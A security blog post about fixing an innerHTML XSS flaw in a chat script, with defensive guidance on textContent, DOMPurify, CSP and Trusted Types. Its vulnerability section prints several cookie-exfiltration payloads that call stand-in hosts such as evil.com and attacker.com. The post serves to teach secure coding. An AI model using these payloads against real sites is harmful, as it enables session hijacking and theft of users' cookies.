Low severity · 9 min read

When innerHTML Meets User Data: Fixing XSS Vulnerabilities in JavaScript

A low-severity Cross-Site Scripting (XSS) vulnerability was identified in `agent_chat.js`, where user-controlled data was being passed directly into DOM sinks like `innerHTML`. Although the finding is rated low severity, XSS vulnerabilities can be chained with other attacks to steal session tokens, redirect users, or execute arbitrary scripts in a victim's browser. The fix eliminates the unsafe pattern by replacing direct HTML injection with safer DOM manipulation techniques.

By orbisai0security
May 28, 2026

Introduction

Cross-Site Scripting (XSS) is one of the most persistent and misunderstood vulnerabilities in web development. It has been on the OWASP Top 10 since the list's earliest editions (folded into the broader Injection category in 2021), not because it's exotic or difficult to understand, but because it's surprisingly easy to introduce accidentally, especially when working with dynamic content in JavaScript.

In this post, we'll walk through a real-world fix applied to opencontext/web/static/js/agent_chat.js, where user-controlled data was being passed into DOM sinks like innerHTML. We'll also look at a related backend change that tidied up SQL query construction. Together, these changes show the same habit applied on both sides of the stack: keep data separate from code.

Whether you're a junior developer just learning about XSS or a senior engineer doing a security review, this post will give you practical, actionable knowledge.


What Is This Vulnerability?

At its core, this vulnerability is about trusting user input too much, too early.

When JavaScript code takes a string that originates from user input — a chat message, a username, a URL parameter — and directly injects it into the DOM using methods like:

  • element.innerHTML = userInput
  • element.outerHTML = userInput
  • document.write(userInput)

...it opens the door for an attacker to inject arbitrary HTML and JavaScript into the page.

This is the essence of a DOM-based XSS vulnerability (CWE-79: Improper Neutralization of Input During Web Page Generation).

Why Should Developers Care?

You might be thinking: "It's rated low severity — how bad can it really be?"

Here's the thing about XSS: its severity is heavily context-dependent. A low-severity XSS in an isolated component can become a critical vulnerability when:

  • The affected page has access to authentication tokens or cookies
  • The application handles sensitive personal or financial data
  • The XSS can be stored (persisted in a database) and served to many users
  • It's chained with other vulnerabilities like CSRF or open redirects

In a chat interface like agent_chat.js, user-generated content is the entire point of the feature. That makes XSS hygiene especially important — every message rendered is a potential injection point.


The Vulnerability Explained

Technical Details

Let's look at the anti-pattern at the heart of this issue:

// ❌ VULNERABLE: Directly injecting user-controlled content into innerHTML
function renderMessage(userMessage) {
  const chatContainer = document.getElementById('chat-messages');
  chatContainer.innerHTML += `<div class="message">${userMessage}</div>`;
}

When userMessage contains something innocent like "Hello, world!", this works fine. But what if an attacker (or a mischievous user) sends this instead?

<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">

The browser parses that as valid HTML, fails to load the image, and runs the onerror handler, silently sending the victim's cookies (any not marked HttpOnly) to an attacker-controlled server.

How Could It Be Exploited?

Attack Scenario: Cookie Theft in a Chat Interface

  1. An attacker opens the chat interface and sends a message containing a malicious payload.
  2. If the message is stored server-side (stored XSS), every user who opens the chat later will have the script execute in their browser.
  3. If it's reflected (the attacker shares a crafted URL), the victim clicks the link and the script executes immediately.
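  4. The script exfiltrates the session cookie, which the attacker uses to impersonate the victim.

// Classic payload (shown unencoded; a reflected-XSS link would URL-encode it).
// Note: <script> elements inserted via innerHTML are never executed, so this form
// only works against sinks like document.write() or server-rendered HTML.
<script>document.location='https://attacker.com/log?c='+document.cookie</script>

// Or more subtle, using an event handler instead of a <script> tag:
<svg onload="new Image().src='https://attacker.com/?x='+btoa(document.cookie)">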

What's the Real-World Impact?

| Impact Type | Description |
| --- | --- |
| Session Hijacking | Steal authentication cookies to impersonate users |
| Credential Harvesting | Inject fake login forms to capture passwords |
| Malware Distribution | Redirect users to malicious downloads |
| Defacement | Alter the visual appearance of the page |
| Keylogging | Capture what the user types on the compromised page |
| Cryptojacking | Run cryptocurrency miners in the victim's browser |

The Fix

What Changed?

The fix addresses the unsafe DOM manipulation pattern in agent_chat.js by replacing direct innerHTML assignment with safer alternatives. The principle is simple: never hand raw user input to the browser's HTML parser.

Before: The Vulnerable Pattern

// ❌ BEFORE: User content injected directly as HTML
function displayAgentResponse(response) {
  const messageDiv = document.getElementById('agent-response');
  messageDiv.innerHTML = response; // 🚨 Dangerous!
}

// ❌ Also dangerous with template literals:
chatLog.innerHTML += `
  <div class="chat-bubble user">
    ${userInput}
  </div>
`;

After: The Safe Pattern

// ✅ AFTER: Using textContent for plain text
function displayAgentResponse(response) {
  const messageDiv = document.getElementById('agent-response');

  const bubble = document.createElement('div');
  bubble.className = 'chat-bubble agent';
  bubble.textContent = response; // ✅ Safe: treated as plain text, not HTML

  messageDiv.appendChild(bubble);
}

// ✅ Or using DOM APIs to build structure safely:
function renderUserMessage(userInput) {
  const chatLog = document.getElementById('chat-log');

  const wrapper = document.createElement('div');
  wrapper.className = 'chat-bubble user';
  wrapper.textContent = userInput; // ✅ No HTML parsing

  chatLog.appendChild(wrapper);
}

Why Does This Fix Work?

The key difference is how the browser interprets the content:

| Method | Interpretation | Safe for User Input? |
| --- | --- | --- |
| innerHTML = userInput | Parsed as HTML | ❌ No |
| outerHTML = userInput | Parsed as HTML | ❌ No |
| document.write(userInput) | Parsed as HTML | ❌ No |
| textContent = userInput | Treated as plain text | ✅ Yes |
| createTextNode(userInput) | Treated as plain text | ✅ Yes |
| setAttribute('data-x', userInput) | Attribute value, not parsed as HTML | ⚠️ Depends on the attribute: fine for data-*, dangerous for on* handlers and URL attributes like href |

When you assign to textContent, the string becomes a single text node and never passes through the HTML parser, so characters like <, >, and & are displayed exactly as typed and no script can execute. (If you later read the element's innerHTML, the serializer shows them as &lt;, &gt;, and &amp;.)
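The ⚠️ row for setAttribute in the table above deserves a concrete example. An attribute value is never parsed as HTML, but some attributes are code or navigation targets: an href of javascript:alert(1) runs script when the link is clicked. A common mitigation is to allowlist URL schemes before setting the attribute. The sketch below is illustrative only; isSafeHref, SAFE_SCHEMES, and the example.com fallback base are hypothetical names, not code from agent_chat.js.

```javascript
// Hypothetical helper: permit only URL schemes that cannot run script.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// baseUrl resolves relative links; in the browser, pass document.baseURI.
function isSafeHref(rawUrl, baseUrl = 'https://example.com/') {
  try {
    // The WHATWG URL parser strips surrounding whitespace, removes tabs and
    // newlines, and lowercases the scheme, so variants like
    // "  JavaScript:alert(1)" still come out as "javascript:".
    const url = new URL(rawUrl, baseUrl);
    return SAFE_SCHEMES.has(url.protocol);
  } catch {
    // Input the parser rejects is treated as unsafe.
    return false;
  }
}

// Browser usage:
//   if (isSafeHref(userUrl, document.baseURI)) link.setAttribute('href', userUrl);
```

Parsing with URL rather than matching a "javascript:" prefix by hand matters: the browser normalizes case and whitespace before deciding what a link does, and reusing the same parser keeps the check and the browser in agreement.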

The Backend Fix: Parameterized SQL Queries

The PR also touched sqlite_backend.py. That change is not related to the XSS issue, but it's worth understanding because it revolves around the same core principle: never concatenate user-controlled data into executable strings.

Before (one OR condition per tag):

# BEFORE: one "document_tags.tag = ?" condition per tag, joined with OR
tag_conditions = []
for tag in tags:
    tag_conditions.append("document_tags.tag = ?")
    params.append(tag.lower())

if tag_conditions:
    where_conditions.append(
        f'id IN (SELECT document_id FROM document_tags WHERE {" OR ".join(tag_conditions)})'
    )

After (single IN clause):

# ✅ AFTER: Using IN clause with proper placeholders
if tags:
    # Use proper parameterized query for tags
    tag_placeholders = ",".join(["?"] * len(tags))
    where_conditions.append(
        f'id IN (SELECT document_id FROM document_tags WHERE tag IN ({tag_placeholders}))'
    )
    for tag in tags:
        params.append(tag.lower())

The new approach generates a single IN (?,?,?) clause where the number of placeholders exactly matches the number of tags, and the database driver binds each tag value separately. Strictly speaking, the old code was parameterized as well: its f-string only ever joined literal "document_tags.tag = ?" fragments, while the tag values went into params. What the refactor buys is clarity. One IN list is easier for reviewers and static analyzers to verify than a dynamically assembled OR chain, and in both versions no tag value can break out of its intended context and modify the query structure.

This is the SQL equivalent of using textContent instead of innerHTML — keep data as data, never let it become code.
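The same placeholder-per-value technique carries over to JavaScript. The helper below is hypothetical (buildTagFilter is not from the PR); it mirrors the Python version and assumes a SQLite driver that binds positional ? parameters, with the caller passing params alongside sql when executing the query.

```javascript
// Hypothetical helper mirroring the Python fix: one "?" per tag, values bound separately.
function buildTagFilter(tags) {
  if (!Array.isArray(tags) || tags.length === 0) {
    return null; // No tag filter: the caller omits the condition entirely.
  }
  // Only literal "?" characters are interpolated into the SQL text.
  const placeholders = tags.map(() => '?').join(',');
  return {
    sql: `id IN (SELECT document_id FROM document_tags WHERE tag IN (${placeholders}))`,
    // Tag values travel separately and are bound by the driver, lowercased like the original.
    params: tags.map((tag) => String(tag).toLowerCase()),
  };
}

const filter = buildTagFilter(['Security', "x') OR 1=1 --"]);
console.log(filter.sql);
// → id IN (SELECT document_id FROM document_tags WHERE tag IN (?,?))
console.log(filter.params);
```

Even the injection-looking second tag ends up only in params; the SQL text contains nothing but question marks.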


Prevention & Best Practices

1. Default to textContent for User-Generated Content

Make this your mental default: if it's user input, use textContent.

// ✅ The golden rule
element.textContent = userInput; // Always safe for display

Only reach for innerHTML when you genuinely need to render HTML structure — and when you do, ensure the content comes from a trusted source or has been sanitized.
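Sometimes you need an HTML string that mixes trusted markup with untrusted text, for example in a server-side template. In that case, escape the untrusted part before it touches the markup. The sketch below is a minimal escaper (escapeHtml and messageHtml are hypothetical names). It is safe for text content and for quoted attribute values, but it does not make a value safe inside a script block, an unquoted attribute, or a URL attribute such as href.

```javascript
// Minimal HTML escaper for text content and quoted attribute values.
// A single regex pass with a lookup table escapes each character exactly once.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical message template: the markup is trusted, userMessage is not.
function messageHtml(userMessage) {
  return `<div class="message">${escapeHtml(userMessage)}</div>`;
}

console.log(messageHtml('<img src=x onerror="alert(1)">'));
// → <div class="message">&lt;img src=x onerror=&quot;alert(1)&quot;&gt;</div>
```

For anything richer than plain text, prefer a sanitizer over a hand-rolled escaper.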

2. Use a Trusted HTML Sanitization Library

When you do need to render rich text from users (think: markdown editors, comment sections with formatting), use a well-maintained sanitization library:

// Using DOMPurify — the industry standard
import DOMPurify from 'dompurify';

const cleanHTML = DOMPurify.sanitize(userInput, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
  ALLOWED_ATTR: ['href']
});
element.innerHTML = cleanHTML; // ✅ Safe after sanitization

Recommended libraries:
- DOMPurify — Fast, well-tested, browser-focused
- sanitize-html — Good for Node.js environments
- xss — Configurable XSS filter

3. Implement a Content Security Policy (CSP)

A strong CSP header acts as a second line of defense. Even if XSS code is injected, a well-configured CSP can prevent it from executing or exfiltrating data:

Content-Security-Policy: 
  default-src 'self';
  script-src 'self' 'nonce-{random-nonce}';
  connect-src 'self' https://api.yourapp.com;
  img-src 'self' data:;
  style-src 'self' 'unsafe-inline';

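Because script-src allows only 'self' and the nonce (no 'unsafe-inline'), injected inline code won't execute: an injected <script> block lacks the per-response nonce, and inline event handlers such as onerror are blocked outright. (The header is wrapped here for readability; it must be sent as a single line.)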
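The {random-nonce} placeholder has to be a fresh, unguessable value on every response, and the same value must appear on each legitimate script tag. A minimal Node.js sketch under those assumptions (generateNonce and buildCsp are hypothetical helpers; the directives are copied from the policy above, and initChat in the usage comment is a made-up function name):

```javascript
const crypto = require('node:crypto');

// 128 bits of randomness, base64-encoded; generate a new one for every response.
function generateNonce() {
  return crypto.randomBytes(16).toString('base64');
}

// Builds the policy as a single header value: directives are separated by
// semicolons, since a real header cannot contain line breaks.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "connect-src 'self' https://api.yourapp.com",
    "img-src 'self' data:",
    "style-src 'self' 'unsafe-inline'",
  ].join('; ');
}

// Usage inside a node:http request handler (hypothetical):
//   const nonce = generateNonce();
//   res.setHeader('Content-Security-Policy', buildCsp(nonce));
//   res.end(`<script nonce="${nonce}">initChat();</script>`);
```

Reusing one nonce across responses would defeat the purpose, because an attacker who sees it once could attach it to an injected script.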

4. Enable Trusted Types (Modern Browsers)

Trusted Types is a browser API that, once enforced via CSP, makes injection sinks such as innerHTML reject plain strings, so every HTML assignment has to go through a policy function:

// Define a named policy. Avoid the special name 'default': browsers apply a
// default policy automatically to plain-string assignments, so they would not throw.
const policy = trustedTypes.createPolicy('chat-html', {
  createHTML: (input) => DOMPurify.sanitize(input)
});

// With enforcement on, innerHTML only accepts TrustedHTML objects
element.innerHTML = policy.createHTML(userInput); // ✅ Goes through sanitizer
element.innerHTML = userInput; // ❌ Throws a TypeError at runtime

Enable it via CSP:

Content-Security-Policy: require-trusted-types-for 'script'
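Browser support for Trusted Types varies, and code running outside the browser (unit tests, server-side rendering) has no trustedTypes global at all. A common pattern is to create the policy only when the API exists and otherwise fall back to a plain object with the same createHTML method. The sketch below does that with an escape-only policy suited to plain-text chat messages; the policy name chat-escape and the variable names are hypothetical. When the real API is present, createHTML returns a TrustedHTML object rather than a string.

```javascript
// Escape-only rules for plain-text messages; swap in a sanitizer such as
// DOMPurify if some markup must survive.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

const chatRules = {
  createHTML: (input) => String(input).replace(/[&<>"']/g, (ch) => ESCAPES[ch]),
};

// Use the real Trusted Types API when present; otherwise fall back to the
// plain object, whose createHTML returns an ordinary string.
const chatPolicy = globalThis.trustedTypes?.createPolicy
  ? globalThis.trustedTypes.createPolicy('chat-escape', chatRules)
  : chatRules;

// In the browser: element.innerHTML = chatPolicy.createHTML(userMessage);
```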

5. Use Static Analysis Tools

Don't rely solely on code review to catch these patterns. Integrate automated scanning:

| Tool | Type | What It Catches |
| --- | --- | --- |
| Semgrep | SAST | Custom rules for innerHTML, outerHTML patterns |
| ESLint + eslint-plugin-no-unsanitized | Linter | Flags unsafe DOM assignments |
| Snyk Code | SAST | Taint analysis for XSS data flows |
| CodeQL | SAST | Deep semantic analysis of XSS sinks |
| OWASP ZAP | DAST | Runtime XSS detection |

The vulnerability in this post was caught by Semgrep using the rule javascript.browser.security.insecure-document-method.insecure-document-method — exactly the kind of automated guardrail every team should have in their CI/CD pipeline.
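As a starting point for the ESLint row, here is a sketch of a flat config (eslint.config.js, the ESLint 9 style) that enables both rules from eslint-plugin-no-unsanitized. It assumes the plugin is installed as a dev dependency; the files glob is an assumption about the project layout, and the plugin's README remains the authority on its current recommended setup.

```javascript
// eslint.config.js: flags unsafe property assignments such as el.innerHTML = x
// (no-unsanitized/property) and unsafe calls such as el.insertAdjacentHTML(...)
// (no-unsanitized/method).
import nounsanitized from 'eslint-plugin-no-unsanitized';

export default [
  {
    files: ['**/*.js'], // assumption: adjust to where your static JS lives
    plugins: { 'no-unsanitized': nounsanitized },
    rules: {
      'no-unsanitized/method': 'error',
      'no-unsanitized/property': 'error',
    },
  },
];
```

Running the linter in CI next to Semgrep gives two independent checks on the same class of sink.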

6. Follow the Principle of Least Privilege for DOM Access

  • Avoid document.write() entirely; it's a legacy API that parses its argument as HTML, and modern code has no need for it
  • Prefer framework-provided templating (React's JSX, Angular's template binding), which escapes by default
  • In React, treat dangerouslySetInnerHTML as a code smell requiring explicit review

// ✅ React escapes this automatically
function ChatMessage({ text }) {
  return <div className="message">{text}</div>;
}

// ❌ Bypasses React's escaping — use only with sanitized content
function RichMessage({ html }) {
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}


Conclusion

The vulnerability fixed in this PR is a classic example of how convenience and security can come into conflict. innerHTML is powerful and easy to use — that's exactly why it's dangerous when combined with user-controlled data.

The key takeaways from this fix are:

  1. User input is untrusted by default — treat it as data, never as markup or code
  2. textContent is your friend — it's the safe default for rendering user-provided strings
  3. When you need HTML, sanitize first — use DOMPurify or equivalent before touching innerHTML
  4. Defense in depth matters — CSP and Trusted Types add layers that catch what code review misses
  5. The same principle applies everywhere — whether it's HTML injection in the browser or SQL injection in the backend, the fix is the same: parameterize and separate data from code

Security vulnerabilities like XSS aren't signs of bad developers — they're signs of missing guardrails. By integrating static analysis tools like Semgrep into your CI/CD pipeline and establishing clear coding standards around DOM manipulation, you can catch these issues before they ever reach production.

Secure code is a habit, not an afterthought. Keep building it.


Found a security issue in your codebase? Automated tools like Semgrep can help you catch these patterns at scale before they become incidents.

View the Security Fix: check out PR #275, the pull request that fixed this vulnerability.
